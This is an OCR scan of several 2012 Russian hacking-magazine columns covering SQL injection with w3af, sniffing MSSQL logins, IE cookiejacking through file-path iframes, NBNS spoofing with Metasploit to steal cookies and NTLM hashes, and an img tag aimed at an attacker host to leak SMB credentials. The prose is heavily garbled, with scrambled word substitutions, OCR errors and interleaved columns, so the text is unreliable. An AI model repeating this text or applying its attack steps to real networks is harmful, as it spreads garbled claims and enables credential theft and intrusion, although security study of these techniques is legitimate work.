РУЧНОЕ ТЕСТИРОВАНИЕ Отправить НТТР-заnрос во нормальной операционной системе позволяется

на конце концов,

-

sqlmap

[sqlmap.sourceforge.netl, замонтированный во wЗaf.

из через множества способов: Telпet,

~

cURL, Wget, Python + urll ib,

:1- выбирай, ч т что касается вяще по мнению душе. В wЗaf на сего

предусмотрены специальные удобные инструменты. П ослать пачку однотипных НТТР-запросов не без; разными значениями одного изо пара­

метров? Пожалуйста! Генерировать соответствующие токены можно на книга а Pythoп. С через редактора НТТР - запросов, во котором есть аж простая п одеветка НТТ Р - синтаксиса, не грех отправлять одиночныезапросы . Ч астовозникаетнеобходимостьвыполнить

Пол у ча е мш е лл че р ез S QL-инъекцию

гаммирование какой-то строки на

URL сиречь попросту сосчитать МО5сумму. Конечно, позволено памяти нанять «echo -п "admin" 0 md5sum>>

:1 Как твоя милость уж дога­

на консоли, так пускать в ход к сего вделанный шифровальщик немно­

Бинго! Обнаружена классическая SQ L-инъекция .

го удобнее. П ри раскрутке стоит на повестке дня смутный SQL-инъекции с гонором

дал из мы , эт что касается з апускаются всё те но плагины, которые твоя милость выбираешь быть

делать различие посредь на лицо ответы веб-сервера , чтобы почему тебе несомненно

об ычном ск анировании.

пригодится замонтированный

diff.

Для поиска «слепых>> вместе с кулей как и поглощать специальные плагины. Вы­

Ну да наконец, разве твоя милость « вайтхат >> либо про­

сто ученик безопасности, так заказчику пентеста нужно согласно казать, как бы

ключим выведение ошибок на настройках РНР равно попробуем задетектить т через

«работает»уязвимост~используявозможностьзкспортазапросов

ж е ба г, однако поуже вслепую. С через НТТР-редактора посылаем пару

на форматы

з апросов для нашему веб-приложению: /useг-info.php?id=1 равным образом /useг-info.

Python. Иными словами , дозволительно сказать: «От­ на жмите .. Сабмит " равным образом смотрите, во вкусе появляется

HTML, AJAX

кройте во эту форму,

равно

p h p? id=1 % 0Ы , а поэтому передаем р езультаты средству для того сравнения тра нз акций. В результате подле вып что до лн е нии SQL-зaпpoca срабатывает

JS-сообщение ... >>

пр ос тейшее алгебраическое выражение, равно да мы не без; тобой получаем пара разных

Р ассмотрим типич н ый схема использования сих инструмен­ тов . Запускаем прокси да шаримея за равным образом со следуемом у веб-приложению

отв е та [информация дл аз многогрешный р а зны х польз об вателей!. Дальнейшим медленно

[не забываем влить проксирование трафика на подсвечник у зереl.

м ож ет из вор всё та но э кс пл у атация вместе с для ули .

На вкладке Histoгy видим отображаемый на реальном времени НТТР­

OUTRO

пробка посередь браузером равно сервером. В случае от сильнее мощным при­

ложением, примем чатом , транзакций короче несравненно больше.

WЗ af- сие действительн что до могучий фреймворк на доска т ирования

В такого склада ситуации в качестве кого возбраняется в меру полноте благоприятный фильтр : не без; его

б ез оп от а из ти веб-приложений . Рас из казывать по части нем дозволяется растянуто ,

через можно, для примеру, заключать лишь транзакции от такими за­

п в отношении этом у моя персона ставил пизда не без; в рассуждении б относительно й задач у сообразно показывать его во действии.

просами, которые содержат габариты во строке << Запросы>> равно держи кото­

Важно, что-то сие отнюдь не прос т что касается случающийся сканнер безопасности, а как

рые был получен 0хх-й ответ.

фр е ймворк, большое сумма дополнений тому доказательство. К тому ж е для того человека , получай базовом у ровне знающего веб равно

Вернемся для нашему приложению. Во сезон навигации сообразно нему

Python,

замечаем, который присутствие наведении в аватар пользователя появляется

малограмотный со ставиттруда прирастить недостающий функционал другими словами проверку.

всплывающее «окно>> от информацией об этом пользователе. Эта

К от тати , как бы да любому свободному проекту, wЗaf нужны новые раз­

сведения выдается во результате как всегда го АJАХ-запроса для

ра б отчики, тестировщики равно несложно активные пользователи. Кого

/useг-info.php?id=1, что такое? видать во истории запросов . Давай протести ру­

з т в отношении з аинтересовало, благотворение nожаловать на заслуженный роспись

ем нынешний скрипт получи и распишись уязвимости. Для нашего запроса на листок выбираем

рас со ылки [ wЗ af . souгce f oгge . ne t l либо нате IRС-канал #wЗaf во узы

«Audit

гequest

with ... >>- нас

интересует, очищать ли с годами SQ L-инъекция .

Fг e enode. ::х::

ld:47

ld: 06

LАутентификация J

~~-----..

[ Сбор ссылок

GЕТ http :/Jloca.lhost /u ser - i n fo .~p 0id-1 НТТР/1.1

~

Accept -l.angu•: en-us,en;q-e.s Accept-encodi ng: identity Keep-alive : 015 Accept : text/htlll, арр lication/xhtlll+XIIl, арр licat ion/XIIl: q..e. 0

user-agent : Нozilla/S.e (Xll; Linux i686; rv:2.&.1) Gecko/Z81 Accept -charset : IS0-8859 - l, ut f -8; q-e. 0, • ;q-e. 0 Нost: localtюst

Refe re r: http://localhosttindex.php Cookie: PНPS ESSI D-гf 0vdbs j ist7is3j6 rlc3p462S

Proxy- connect i on; keep- а li ve

~GЕТ h t tp ://loc al ho s t t u ser- in fo. php 0id· 0~Bl НПР/ 0 . 0

Accept- l anguage: en-us,en;q-e.S Accept-encoding : identity Keep-alive: 015 Accept: text/ht.l,application/xhtii\+XIIl ,application/xlll ;q..e. 0 , .-, . ;q-8.8 User-agent: t10zilla/S .8 (Xll ; Linux iб86; rv:2.8. 0) Gecko/28118438 Firef o Accept -charset: IS0-88S9· 0,utf -S; q-8. 0, • ;q-e. 0 Нost: localhost Referer : http://l ocalhos t /index. php Cookie: PНPS ESS I D• rf 0vdbs j ist7 is З jбrlcЗp462S Proxy-connection: keep-alive <style>

<style>

"' (height:

"'( height :

ерх; Ьorde r : 0рх; Ьorder-top:

</ style> <tаЫе Ьo rde r- " 0 "

<tа Ые Ьогdег-· е· из е\ \sp<~c i ng- " S " c\ass-· userТaЫe">

~ <1: Г><t d> Fi rs t natlf!: </td><td>Jaii'IE!s</td></t r> <t r><td>Las t na~~e : </ td><td>Bond</ td></ t r> <tr><td colspan• "2"><hr />1 like Vodka ... shaken not stirr <t r><td co\s an•"2 "><hr /><а href• "/IIIE!ssages .p_h ?to•jai'IE!s </t r> </table>

0Sellext lo compare J

ХАКЕР

03 / 058/ 00 02

Ipx solid gray;

0

0 </sty\ e>

Модель работы категория равно тасовка для ого ск анера уязвимостей веб - прило ж ени й

ерх;

Ьorder: ерх; Ьorder-top:

l px solid gray;

~

cell spacing•" S" cla s s-~ us e rТaЫ e "> <tr><td>Firstnane: </td><td>A\isa</td></ t r> <1: r><td>Las tnaii'IE! : </td><td>Se lezneva</td></t r> <tr><td colspan•"2"><hr />Spacegir\1 J! !</td></tr> <tr><td cols an•"2"><hr /><а href• " /IIE!ssages . ~h~7to-alisa " >Send Priva </ t r> </tabl e>

[<lo::J o12

Утилита равным образом з соединение а wЗ af к сравнения НТТР-т ранз акций

051


ВЭЛОМ/ЕАSУ НАСК

Алексий «GreenDog » Тюри н, Digital Security ltwitter.com/antyurinl

ОТСНИФАТЬ ПАРОЛЬ ПРИ АУТЕНТИФИКАЦИИ В

MSSQL

Ef.3Jf..i!f.·l ъ--

Microsoft SQL server- сие

одна изо самых распространенных СУБД.

0.

Шифрование демократично , так отключено:

ENCRYPT_O FF- ОхОО. ENCRYPT_ON - Ох01. ENCRYPT_NOT_S UP - Ox02 .

Шифрование приемлемо да включено:

З.

Шифрование недоступно:

Как да многие некоторые люди съестное

Microsoft, SQL server предлагает два вида аутентификации : integrated [sign-on], так лакомиться аутенти­ фикацию п что касается виндовой у ч етной записи, да native, в таком случае убирать классиче­

0.

Шифрование требуется: ENCRYPT_REQ-OxOЗ.

скую, объединение логину да батман ролю. Оба способа используются будет

тря получи название, кодирование рядом таком значе нии используется,

часто.

же всего лишь интересах процесса . А чисто эпизодически есть расчет

По дефопту данные, передаваемые за сети, утилитарно

зашифрование малограмотный используется совсем. Таким образом, наша сестра кардинально

безграмотный шифруются. Если точнее, так шифруется тяжба аутентифи­

можем осущест свивать классическую МiТМ-атаку и, подменив показатели

кации пользователя, а самочки данные- нет. Конечно, ради атаки

лишь всего лишь во одном жете кете, целиком отключить зашифрование

сего было бы достаточно. Зачем нам логин да движение роль, кабы я

да отснифать аутентификационные данные.

Давай рассмотрим двум ее особенности.

0.

0. 2.

г

По дефопту устанавливается важность

ENCRYPT_O FF.

Несмо­

ENCRYPT_NOT_SUP,

Кстати, писатель сего исследования довел всё перед логического

можем получи и распишись лету сменять представление иначе получитьданные , итого только что

устроив arp-spoofiпg среди сервером равным образом клиентом? Затем, ась? сие

конца - создал узел интересах

безграмотный самое насчет стое занятие - фальсифицировать черт знает что получи и распишись лету. Поэтом у по­

ради нас равно сделает. Только , думаю, з десь целесообразно усмотреть одну особен­

Metasploit Framework,

некоторый всё

ность. В описываемом случае узел невыгодный меняет информация получай планирование у,

пытаемся вытащитьлогин равным образом пароль.

а поднимает ТСР-порт, равным образом всего только не без; него исходняк редиректятся

Не приблизительно давным-давно один человек подо ником fOrki изучил сей урок [!J.i.LЬ'L s8g07r l. Посмотрим, ась? но дьявол выудил. Дл моя особа азы то, почто дан­ ные MSSQL передаются во конфигурация т е Tabular DataStream protocol

возьми MSSQL-cepвep следовать итог покамест одного соединения, созданного уже атакующим, что, тем невыгодный менее, неграмотный создает особых проблем. Всё, аюшки?

требуется, - з т насчёт образовать редирект трафика, приходящего

[ bit . ly/z З oVPR I. Н по части лично настоящий пр отокол далеко не поддерживает шифрова­

в хост атакующего позднее arp-spoofing-aтaки, получи соответственный

ние . Как но так? Откуда зашифрованные п акеты авторизации?

местного характера порт. Но равным образом эту из-за дачу

После непродолжител ьны х мучений из

во собственный узел нищенский shеll-скрипт.

Wireshark fOrki

обнаружил

автоматизировал, добавив

fOrki

кончено интересную вещь: в целях шифрования после этого использу­

ется рядовой

SSL [с самоподписанным сертификатом], который TDS . Нестандартное решение. Но сие невыгодный круглым счетом

-----

-

- -

--

-

-

~--------

работает вн утри

важно. Самое интересное- сие установка ТDS-соединения, так называемого пакета

PRELOGIN . Он

-

-----

задает разнообразные

настройки да на томишко числе указывает, хорошенького понемножку ли использоваться шифрование. За шифровка отвечает поле рое может обретать сле д ующие значения:

052

- - -

ENCRYPTION,

кото­

------------

-

-

- - - -- - - - --

Выбор метода получи и распишись основании флагов, установленных у клиента равным образом сервера

ХАКЕР

03/158/2012


EASY

УГНАТЬ КУКИСЫ С ПОМОЩЬЮ

UI-REDRESSING

НАСК

......... ·Jйи г

В декабрьском номере][ автор познакомились из этакий вещью, на правах

clickjacking.

насчёт -·

Сrатья была очен ь полезной, только писатель далеко не упомянул об

одном замечательном трике. На самом деле обозначение

т

~ Р - ~ - G~ ·

Adcms iQ c:'iOocunert:sns.ttnat~

clickjacking ui-

никак не абсолютно правильно отражает соль атаки, равным образом ми кажется, ась?

сие паче правильное nонятие. И умелость , которую аз многогрешный

redressing -

.,_

опи ш у ниже,- самое яркое т ому подтверждение.

Итак , n озволь продемонстрировать тебе технике рассказал

cookiejacking. Впервые об этом Rosario Valotta нате HITB на Амстердаме на 0011

0iS9l003 .Z<19775128.132514ИЭ9 .132 . account.в .9CJ09le. соа/ >600

году. Потенциал техники огромен- nросто до от тавь , что-то не без; ее по­

088086656

мощью не возбраняется nо хи тить куки через люб в рассуждении го ущелье та , инда ото защищенно­

ll3080 0SS Z

00191238

го НТТРS-протоколом! Однако после этого убирать небольшее предел :

работает возлюбленная только лишь во

по отношению

D

IE !но зато вот всех версиях! . Теперь ну-ка

Во-первых, дьявол использовал

IE.

0-day,

которая перевода нет нет слов всех

С виду сие безграмотный такая полоз да не без; трашная дырка, а дальше у ее

неграмотный одиноко стремились пропатчить. Как твоя милость поуже знаешь, на

st..edDotunerts

~ Мy((ЩIII:et"

_,;j...,__."""

посмотрим, аюшки? но п редлагает нам таковой И Б-специалист.

версиях

.....- .

IE

Об х од кр осс- зон да й политики равно путь ко локальным кукисам с зоны и да и нет

питаться

узлы. В разных зонах действуют неравные настройки безопасности.

Rosa rio сие мячик! на другой !сетка!. Под мячик пишущий сии строки прячем свой iframe не без; кукисам и, а получи самом

Н аn ри мер, описанная повыше автоматиче ска автор этих строк NТLМ-а утентфикация

сайте создаем шлифовальщик интересах переносимых данных. Н насчёт равным образом сие до данный поры

такая фича, наравне раздвоение получай зоны:

д ейст вует дл моя особа уз вылавливание зоны

lntranet

lnternet, lntranet,

доверенные

да выше. Вот сnисок зон, отсо­

- перепереть единственный штучка !в модель е

никак не всё . Нашему

iframe

пишущий сии строки добавляем характер

scrollspeed

от большим

значением. Это делать нечего чтобы того, воеже клик, совершаемый

ртированных на nорядке уменьшения привилегий:

пользователем, превращал ся во касательно перацию отделения вслед за вычисление само­

стоятельного перемещения lпроскролливанияl

Local Machine Zone Local Intranet Zone Trusted Sites Zone Internet Zone Restricted Sites Zone

iframe с самого

верха на самы й низ. Таки м образом, получается, что такое? читатель во время общество получи и распишись самом деле выделяет подтекстовка в мячик во корзину, перемещает сие т подтекстовка

iframe, а перемещая drag & dгор'ом, на итоге пере­

давая слова хакеру. Возможно, что такое? нате словах всё сие важно безграмотный очень понятно, хотя вроде токмо твоя милость посмотришь видео бери сайте

Rosario Valotta

С без п бог н ос т ью равно зонами связан вновь нераздельно момент- распорядок

I Ьit .l y/iN xvT Ь) , так зараз поймешь логику метода и, на частности, техни­

кросс-зон ног в отношении взаимодействия. Согласно самому общему прави­

ки сопtепt extractioп, инда разве твоя милость невыгодный наслышан не без;

со паче привил егированной . Та ким образом, требование стих

<iframe

JavaScript.

Думаю, аюшки? об эту пору проститутка тезис атаки ясна . Однако у нее лакомиться

лу, ме н ее привил егирован н а аз многогрешный зо держи н е может взаимоде йствова ть

серия нюансов. Во-первы х, буква штурм работает получи и распишись всех ОС

кук и. Таким образом, возьми стра вниз у сайта зоны всемирная паутина не возбраняется

Windows, что-то да создает проблему :1. Файлы кукисов во ХР равным образом в Vista/7 лежат во разных местах . Для ХР сие C: //Documents and Settings/%user_name%/Cookies, а чтобы побольше новых версий винды -C: /Users/% user_name %/AppData/Roaming/Microsoft/Wi ndows/ Cookies. Тем малограмотный менее, э т а « геморрой » решается будет просто,

встав ить от ожеледь ую щий фрейм:

во всяком случае значительная браузеров отправ л яют на каждом после пр осе заголо­

src="file: // c :/boot . ini " >

со страницы зоны интернетприведет

для ошибке дост у па. Уязви мость

0-day

состоит на том, зачем кросс-зонная курс

отнюдь не действует пользу кого оnре д елен ны х файлов, а собственно про файлов

вок User-Ageпt, тот или другой аспидски почасту охватывает на себя равным образом версию ОС.

<iframe src="file :///C: // Documents and Settings / %user_name%/Cookies " > </iframe>

Кроме того, чтобы опре дел ения версии ОС допускается применить тем же

JavaScript.

Во-вторых, по образу твоя милость , аз многогрешный д умаю, заметил , нам делать нечего

смыслить прозвание пользо вателя получи его компьютере, да сие главная про­

Здесь % user_ пame % - сие кличка пользователя на ОС. Куки но

блема. Для ее решения дозволяется попробовать забаррикадировать пользователя

у каж дог касательно п в рассуждении ль зователя свои, п оэ ведь му хра нят ся они во личных п ап­

приспособиться в соответствии с протоколу

ках . Пр равно мер, иллюстрирующий прочитывание кукисов

передает прозвание пользователя на равных правах не без; другими полями. Дл моя особа сего

Google,

твоя милость сможешь

SMB.

Пр равным образом подключении соответственно н ему покупатель

нате ядовитую страни ц у надлежит наболтать чисто таковский простой

уви подевать бери скриншоте.

Во-вторых , вдобавок 0 -d поминай во вкусе звали - бага, сочинитель использовал специальную

extraction lпредстав ­ лена П олом Стоуном нате BlackHat Europe - 0010, goo.g i/ZBYNw l. Зачем? Хо тя да мы со тобой да подгрузили во iframe обложка от кукисам и, впрочем

кoд:<img

технику clickjackiпg·a подина названием conteпt

src=" \\attac ker.host.com\ any . jpg" ></ img >.

Конечно, до текущий поры потребуется выставить переработчик запросов

возьми

045

порт, а дальше создать его связь со wеЬ ­

сервером. Как видишь, растолкованный способ без труда шикарен! Однако

надергать д ос т у п ко данны м во н ем да мы не без; тобой отнюдь не можем. Здесь д ействует

внутренние резервы е г что касается использования чаще просто-напросто огра н ичивает филь­

кросс-д омен ная курс , тем безграмотный менее свой сайт находится около на сети,

трация такого трафика бери сетевых устройствах . К тому но з д есь

а во

встает вновь одна проблема. На дворе сейчас весна-красна 0012-го, а

ifram e у

нас сидит

localhost

пользователя.

Суть этой специальной т ех ники порядочно проста. Все совре ­ менн ы е браузеры поддерживают

drag & drop,

не без; п омощью которого

пофиксила у язвимость во

Microsoft

IE

Microsoft

до сего поры во начале осени 0011-го. Кроме того,

внесла изменения во название кукисов во файловой

ламер может пережить информация со насчёт дног касательно сайта сверху др угой .

системе. Теперь их названия лишились п по отношению н ятного удобочи т аемого

Таким об ра зом, Юзеф е р , в соответствии с сут да , копирует данны е во что до дн ом месте

вида user_пa meradomaiп[couпter].txt равным образом со т разве похожи в буквенно­

равно вставляет во другое . Кросс -дом е нным п олитикам з д есь прицепиться

цифровые рандамы небось 07ТVLB D W.txt. П оэтому перевоплотиться ко ним

невыгодный для чему. Так вот, сопtепt extractioп - это, элементарнее говоря , сколько-нибудь

напрямую в такой мере несложно ранее далеко не настил учи тся. Впрочем, по части статистике,

перетолкованный

жуть малое наличность поль зователей предварительно обновляет

drag & drop. Заманив

бери интенсивный clickjackiпg-caйт

нашу жертву, наш брат предлагаем ей, например, потренькать во игру. Ее содержание

ХАКЕР

03/158/ 00 02

вместе с вои браузеры, особенно разве предложение пусть будет так об

IE.

053


ВЗЛОМ/ЕАSУ НАСК

СОБРАТЬ ИНФОРМАЦИЮ РЕШЕНИЕ

SkiJJ Tracino Framework

Сбор информа ц ии яв л яется что касается д ним изо важнейших этапов близ про­

;\ ' Ift'(' '•\ , 0 0 \

l

J(r~>r

,J 0'l tlll , ' ' , о..; 0'1,

.. t l

"it .._

ведении ауДита без п аснос т равным образом lну не ведь — не то атаки). Ведь нам необходимо найти самое слабое поле равным образом а там попробовать грабить путем него всю систему. Но с какой-нибудь сие радости иска т ь запутанный путь, когда самым слабым местом любой, ажно самой защищенной системы является чело­ век? Ты во зачем бы ведь ни стало знаешь в рассуждении существовании эдакий замечательной

DNS command Une

вещи, по образу социальная инженерия. Е е действительность напрямую

***'*

WeЬsfte

зависит с доступной информации насчёт человеке, посему тысячи

*** IPNelghЬors

специалистов равно проводят непохожие исследования нате эту тему.

***,

Однако на России таковой т ен д енции ноне что-то неграмотный наблюдается, приблизительно

Spamllsts

***•

в духе наши пользователи си д автор этих строк т на основном токмо на Одноклассниках

MaШngllsts

равно В Контак т е, д а да насчет ц есс информатизации вновь не мудрствуя лукаво далеко не доше л

***

DNS lnformetion Gathering command line • Flen:e Domllln scan i:J

****; **** • DNSEnumtooi GI ***i • S dlg ~ns.domaln .com domaln.com AXFR ***

• The Н.rvester comm.1nd llne tool Q

Q

Machinespeclflc

поперед большинства ведомст во . В любом случае моя персона думаю, что такое? тебя за­

интересует релегация

lntorm•tlon

tools

***;

makensi .es/stf. Автор этой страницы малограмотный поле­

нился сконцентрировать на одном месте никак не плохую коллекцию всевозможных онлайн-сервисов, которые могут пойти в ход тебе на процессе взлома другими словами пентеста, с тем надергать всю необходимую информа­ цию в качестве кого по отношению человеке, эдак да в отношении всей подопытной системе.

О nреде nя ем nлаги ны

WordP res s

НАЙТИ АЛЬТЕРНАТИВУ DNS И ПРОСПУФИТЬ NETBIOS

li•iaf..i!!f.ll т ·лw т

е от ли во файле перевелся nри вязок, производит представление ко D NS - cepвepy. За ­ Всем нам известно, что такое? ради определения IР-адресов согласно именам

те м

используется соглашение

Здесь необходимо уточнить, который

докука касательно безопасности !тогд а существовали сильнее важные зада­

NetBIOS Name Seгvice. NetBIOS входит на Windows в области дефолту, а NetBIOS Name Seгvice INBNSI- сие оный но протокол, исключительно

чи), того на сегодняшнее сезон на нем кушать избыток недостатков

предназначен дьявол на установки соответствия посредь NеtВIОS­

вместе с точки зрения безопасности . Однако возьми смену ему изволь

именами равным образом IР - адресами. В процессеработы настоящий документ либо

ONS.

Протокол проектировался помимо особой

DNSS EC,

Windows

использует такую штуку, как бы

равно моя особа надеюсь, сколько си т уа ц ия изменится на лучшую сторону. Сами не­

использует особый WINS-cepвepa, либо отправляет широко­

достатки

пророческий задание во подсак !думается, пока что образ атаки понятна).

DNS

самый здорово проявляются во локальных сетях,

Но вернемся ко уже одному важному моменту- D NS-зanpocy

особенно коли ты да я можем прово д ить атаки в виде aгp-poisoning, позволяющие п росматривать равно мо д ифицировать трафик, которым

ко серверу. Если сервер ответит пользова т елю, так следовать п рос объединение

обме н иваются жер т ва равно се рв е р . Н касательно д авай предположим, ч т в отношении

сейчас неграмотный хорошенького понемножку отправлен . А по образу а DNS-cepвepy н е ответи т ь, yes л равным образом

NBNS

объединение каким-то п ричинам всё э т касательно нам отнюдь не д оступно, и так наша сестра равно находим­

увлекающий пользователя сайт ХХХ.СО М равно м ее т ОN S-за п ись?

ся на одной лока л ке от жертвой . П усть, например, во сетке при­

Здесь автор сих строк можем выехать возможнос т ями современных

сутствует некая

браузеров : поиском изо адресной строки да подстано на какой доменов

005,

равно я положительно безграмотный хотим, дабы неизвестно кто заметил

нашу хакерскую предприимчивость . Тогд а нам нужно орудовать тихо,

верхнего уровня

используя всего трио д артные потенциал протоколов. Уточню

привыкают причинять то, что-то их интересует, стоймя на а д ресную стро­

l.com,

.гu) . Как именно? Сейчас пользователи

задачу. Нам что поделаешь перенять куки, передаваемые пользо­

ко у, а браузеры невыгодный век могут понять, хочет ли абонент

вателем нате теоретический сайт ХХХ.СОМ. Изначально может пока­

черт знает что выискать во поисковике не в таком случае — не то без затей растворить сайт. Е со т ь, конечно,

заться, в чем дело? альтернатива малограмотный имеет решения, да начинать рассмотрим, каким

определенные паттерны !например, пробелы на адресной строке),

образом ОС

Windows

только куда как чаще браузерыв первую черед резолвя т псевдоним всего лишь

определяет IР-адрес сайта. Первым делом

порядок проверяет статическую привязку

IP для

упомянутым вне способом . Что до этих пор интересней, около отправке

именам, хранящим ­

ся на файле hosts IC : \Windows\System32\dгiveгs\etc\hosts). Д алее,

• FiltEr: J(chs ог No.•

' 1,..

Заnрос

051.

.

08313 . 063879 485 03 . 086589 493 03 . 00'3700 494 03 . 005520 528 04. 05 0488 570 05 . 005637 URL во

...

nros ) and ip.addr

0 Time

0Destnation

0Source ~

DNS-зanpoca для введенной пользователем строке добав л яется

0 123 2 123 123 123

=

Ejp'ession ... Cleat Арр!у 1 ProtDcol

023 2 123 255 255 255

ONS DNS DNS NBNS NBNS NBNS

lmro

. .. .

Standard query response_. NO such Standard query А makaka. stanoard query response, No such Name query NB МАКАКА<00 > Name query NB МАКАКА<00> Name query NB МАКАКА<00>

nате

nате

браузер е nоро ж дает nачку ра з личны х заnросов пользу кого резолва равным образом мени

ХАКЕР

03/158/2012


EASY

027 128 162 163 185 186 258 259 319

068.190841 368. 027678 423. 072957 423.407005 442.487183 442:734222 666. 050204 666. 081655 727. 067776

092.168.0.101 192. 068. о. 002 192.168.0.101 192. 068.0.102 192. 068. о. 001 192.168.0.102 192.168.0.101 192.168.0.102 192.168.0.101

092.168.0.255 192.168 . 0.101 192.168.0.255 192.168.0.101 192.168.0.255 192.168.0.101 192.168.0.255 192.168.0.101 192.168.0.255

NBNS NBNS NBNS NBNS NBNS NBNS NBNS NBNS NBNS

02 104 92 104 92 104 92 104 92

Name Name Name Name Name Name Name Name Name

query query query query query query query query query

НАСК

:00> NB ?? response NB 092.168.0.102 NB iiiliiiliiiliiil lliiilll RU<OO> response NB 092.168.0.102 NB .GOOGLE.COM<OO> response NB 092.168.0.102 NB .-RU<OO> response NB 092.168.0.102 NB AASDASD 0188RU<OO>

N B NS- cn yф ан r во д ейст вии

однозначный суффикс, во результате почему из сего следует полное до­

0.

Запускаем : run .

менное фамилия .

Вернемся для краже кукисов. Итак, используя NВNS-спуфинг, наш брат

Теперь нам должен подделать отзыв получи NBNS-зanpoc. Для этого нужен Tгansaction

00

можем сменить какой-либо рандомный запрос. Но нам нужны

с NBNS - зanpoca . Но , наравне ранее было

сказано выше, нынешний просьба чаще общем является широковещатель­

кукисы не кто иной из ХХХ.сот, а вследствие этого я проворачиваем неболь­

ным, а круглым счетом равно как наш брат находимся во пирушка но локалке , так никаких проблем

шой трюк- поднимаем веб-сервер со страничкой, содержащей

не без; его получением нет. К нашей радости, пользу кого спуфинга во

литофанический структура !можно заюзать JavaScгipt) , а сейчас на зто м фрейме

MSF сейчас

nрисутствует равносильный модуль. Вот краткая диаграмма дей­

загружаем ХХХ.сот. Однако нам полагается безграмотный без труда навалить ХХХ .

ствий:

сот, так снова равным образом предпринять так, воеже браузер невыгодный есть его не без; через

0.

Загружаем модульдля Net BI OS-cynnингa:

use auxiliary/spoof/

0. 3.

0.

DNS

равным образом начал истощить с целью поиска всего только

NBNS.

Очень не фунт изюма ,

дабы браузер продолжал исчислять просп уф ленный владение тем а

nbns/nbns_response. Выставляем регэпс ответов бери требования :

Set REGEX *google*. set spoofip xa.kep.

своевольно ым доменом, иным способом на силу вступят кросс-доменные политики

равно никаких кукисо во автор сих строк малограмотный увидим. Так вроде указанная методика

Указываем, экой IР-адрес подставлять:

IP.add r ess.

разресерчивалась что крат нет слов времена написания сего текста, ведь

Зanycкaeм: run.

единственным достойным вариантом получается заявка для н есуще­

Теперь сделаю небольшее отступление. Создатель сего моду­

Теперь м касательно ж только отвести общ да й алгорит м а таки :

ствующему поддомену атакуемого сайта.

ля ITiт целей

Medin) предлагал пускать в ход его совсем ради други х lgoo.gi/Jz2Q9), а то есть ради банального сбора NТLМ-хешей.

0. 2.

Поднимаем wеЬ-сервер из легированием входящих запросов

!чтобы соби дружина кукисы) да фреймом, ссылающимся возьми несуще­

Е сли точнее, так впоследствии запуска вышеуказанного модуля через браузе­

ствующий поддомен ХХХ.сот !например , asdasdasd.XXX.coт ) .

ра приходит вагон запросов, п ричем чаще общей сложности следственно

спуфить короткие имена ! в виде тakaka), а отнюдь не длинные lтakaka. сот). С учетом логики работы Windows короткие имена причисля­ ются ко зоне интранет !не интернетl). А сия площадь во IE будто « до­

Устанавли ваем NВNS-сп уфи нг бери однако имена.

0.

Жертва, которая ввела нечто во адресную строку браузера, спу­ фится сообразно

0.

NBNS равно

спуфится по мнению

веренной», да на ней действуют незначительно не столь грозные настройки безопасности. К примеру, на этом месте разрешена автоматическая аутен­ тификация возьми сайтах. Таким образом, я можем впустить часть

0.

редиректится в хостхакера.

Бра узер автоматом резалвит asdasdasd.XXX.coт, и, вновь же,

NBNS.

Браузер что касается тправляет кукисы ХХХ.сот нате asdasdasd . XXX.coт, то есть нате хостхаке ра.

для того сбора N Т LМ-хешей в соответствии с Н Т Т Р !хотя дозволено равно по части

0.

Загружаем модульдля

SMB): снифинга: use auxiliary/server/

Так им образом, наш брат можем заразиться кукисы через множества сайтов. Ед инст венн ое срезание в этом месте на том, чтокукидолжны

capture/http_ntl m. 2. 3.

Страница, идеже достаточно вырабатывать ся запрос:

являться установле ны никак не в ко нкретный отделение IХХХ . сот), а сверху владение

Порт, идеже поднимется веб-сервер :

I . ХХХ.сот) .

set URIPATH . set SRVPORT ве .

ПЕРЕХВАТИТЬ ТРАФИК НА

LOCALHOST ПОД WINDOWS

ы.r.&~tfl г.

Недавно аз многогрешный столкнулся вместе с безграмотный возможностью миновать затор

настройки

вследствие прокси быть системных обращениях для

прокси держи

-127.0 .0.1. Почему

localhost

системных? Потому, сколько настройки

щиеся прокси , используются большинством ПО в мер,

Python

либо — либо для л у пбзку

IE, касаю­ Windows. Напри­

подле использовании uгll i b2 автоматом беретка прокси

г

IE равно .NET fгатеwогk запрещаюттрафику двигаться через localhost равно 027.0.0.1 . В IE9 эту проблему посчастливилось принять решение

вслед за счисление того , сколько на настройках дозволено поднять опцию << никак не исполь­ зовать прокси>>-

<<-localhost».

Решение , на общем-то, нечеловечески простое. Во - первых, позволено

ОС . Надо отметить, ась? заостреннее итого п роблема проявляется,

обходиться для сервису согласно любому

IP

эпизодически услуги поднят как для внутреннем интерфейсе 0127.0.0.1) и недоступен получи и распишись внешнем 00.0.0.0). В оный разок ми посчастливилось сделать выбор

скажем соответственно адресу

что целое они относятся ко одному

ее каким-то обходным через , хотя давеча автор наткнулся в инте­

резолва имен hosts l % windiг%\dгiveгs\etc\hosts) другое название для lo calhost : 027.0.0.1 localhOst .

ресный положение во благе Eldaг Maгcussen. Он написал, в чем дело? дефолтные

ХАКЕР

03/158/2012

г

027.1.2.3, приближенно

во

027

подсети, вдобавок первого,

интерфейсу. Во-вторых , не запрещается nрописать на файле локального

055


Павлуня Александрович [iv i nsi d e .Ы o g s p ot.com[

ВЗЛОМ/ОБЗОРЭКСПЛОИТОВ

Димаша Михайлович

[115612, дескать р. К рас н ая звездо ч ка, д . 0[

Обзор эксплоитов В этом интереснейшем обзоре пишущий сии строки рассматри­ ваем свежую незащищенность во ядрах

Linux,

позво­

ляющую помимо особого труда вздуть льготы

0

Локальное взлет привипегий на Linux

CVSSV2

0.8

0111111 011 0 011 01111

01 01 0 [AV: L/AC: L/AU:S/C:C/1 :C/A:CI

l:iil'II3] Уязвимость связана от интерфейсом /ргос/<РI 0>/mem [где <PID> идентификатор нужного процессаl, что Linux предоставляет

Microsoft Office равным образом Acrobat Reader, а в свой черед ХХЕ-инъекцию на phpMyAdmin.

для того неприкрытый запи от да на парамнезия процесса равно чтения с нее. В ядре версии

Не пропусти!

поперед не без; тат касательно чно защищен с неавторизованного доступа вместе с через

во системе, баги на

0.6.39 разработчики у брали директиву #ifdef,

исключающую прямую

переписывание на воспоминания процесса, потому что сочли, зачем данный интерфейс уже других ме х анизмов ядра. На самом деле nисать во воспоминания процесса мож е т все в равной степени какой пользователь, обладающий достаточными правами.

Как оказалось, сии полномочия проверяютсЯ далеко не положительно корректно. В итоге пол у чило не без; ыо , чтополучилось:вовсехверсияхядра,начинаяс

0.6. 09, сердито у мышл е нник может продвинуть по мнению « карьерной лестнице» до рута любого имеющего со моя особа пользователя .

056

ХАКЕР

03/158/20 02


Обзор экс пло итов

цt:J4!·Jii

